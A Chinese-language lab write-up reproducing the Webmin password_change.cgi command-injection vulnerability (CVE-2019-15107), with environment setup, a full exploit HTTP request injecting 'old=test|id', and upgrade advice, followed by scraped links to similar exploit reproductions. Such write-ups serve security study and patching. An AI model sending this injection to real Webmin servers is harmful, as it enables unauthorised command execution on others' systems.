CVE-2019-15107 Webmin远程命令执行漏洞复现
0X1 漏洞概述
Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。
影响版本
Webmin <= 1.920
0X2 环境搭建
根据最新消息,该应用在官方提供的sourceforge下载的源码才包含这个漏洞,而官方Github上的代码是安全的。这也证明这个RCE漏洞很有可能是一次供应链攻击,黑客控制了官方sourceforge账户并植入了后门。在sourceforge上下载,链接如下
https://sourceforge.net/projects/webadmin/files/webmin/1.920/
在这里,我们下载deb安装包,在ubuntu16.04中安装,如下:
如果报错,按照提示更新系统就可以了。安装成功之后,以root账户身份登录即可。
https://192.167.0.217:10000/sysinfo.cgi?xnavigation=1
登录之后点击authentication修改密码重置配置
查看配置文件
cat /etc/webmin/miniserv.conf
0X3 漏洞利用
访问/password_change.cgi链接,抓包注入命令
POST /password_change.cgi HTTP/1.1
Host: 192.167.0.217:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: redirect=1; testing=1; sid=2c97114272115f9e3e52307ff418b31d; sessiontest=1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
这里的user值要是用的是一个假的用户,使用真实的root测试不成功,只有在发送的用户参数的值不是已知的Linux用户的情况下(而参考链接中是user=root123),展示进入才会到修改/etc/shadow的地方,触发命令注入漏洞
查看response
可以看到命令执行成功!
0X3 漏洞修复
升级到最新的1.9.30版本即可
参考链接
http://www.webmin.com/index.html
https://www.exploit-db.com/exploits/47230
https://blog.firosolutions.com/exploits/webmin/
https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md
CVE-2019-15107 Webmin远程命令执行漏洞复现相关推荐
- PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...
- 华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- 开源堡垒机JumpServer远程命令执行漏洞复现
声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...
- Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析
Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...
- Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现
目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞
- HFS远程命令执行漏洞复现
漏洞程序下载地址:Http File Server 这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题.再Window ...
- Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)
漏洞描述 Solr是Apache Lucene项目的开源企业搜索平台. 其主要功能包括全文检索.命中标示.分面搜索.动态聚类.数据库集成,以及富文本的处理. 2019年10月30日,国外安全研究人员放 ...
- thinkphp5.*远程命令执行漏洞复现
ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http: ...
最新文章
- HashSet的使用
- Working with multiple environments
- Unity3D游戏开发之使用SVN对Unity进行版本控制
- layuiAdmin打开新窗口、新标签页
- 「每天一道面试题」String和StringBuilder、StringBuffer的区别
- lucene4.7 高亮功能(八)
- static 静态局部变量
- Android 第一行代码
- paper 63 :函数比较:imfilter与fspecial
- 2021-09-03相同的树
- ABTess之AA 测试
- 简述autocad在测绘工程中的应用_AutoCAD在工程测绘制图中的应用
- 为什么宁愿工资低点,也不建议去外包公司?
- 读July关于概率论所想
- pdf添加水印的方法,pdf加水印步骤
- 广东电大计算机绘图试题,2014年电大计算机绘图期末复习试题及答案参考小抄.doc...
- Elasticsearch Ingest-Attachment
- MATLAB中的偏最小二乘回归(PLSR)和主成分回归(PCR)
- 同步六进制加法计数电路(D触发器)
- 去除IntelliJ IDEA中重复代码报灰黄色的下划波浪线
热门文章
- Adobe illustrator 抽丝剥茧选中多个点 - 连载 13
- guid怎么做到唯一_怎么做成为一个好女人呢?
- 提高篇 第三部分 图论 第4章 差分约束系统
- oracle监听服务无法启动不了,关于ORACLE监听服务无法启动的问题
- 论文公式编号右对齐_公式对齐(二):公式居中,编号右对齐(MathType 6.9)
- 正确的python变量名_在Python,如何将变量名作为字符串?_others_酷徒编程知识库...
- 平面设计师okr_设计团队如何推进OKR实现设计赋能
- excel批量更改超链接_批量新建Excel指定名称工作表并设置超链接!你,学会了吗?...
- Java笔记-Spring Boot中Spring WS WS-Addressing中@Action实例
- Qt笔记-解决Q3DScatter加载QCustom3DItem时Cannot open the file问题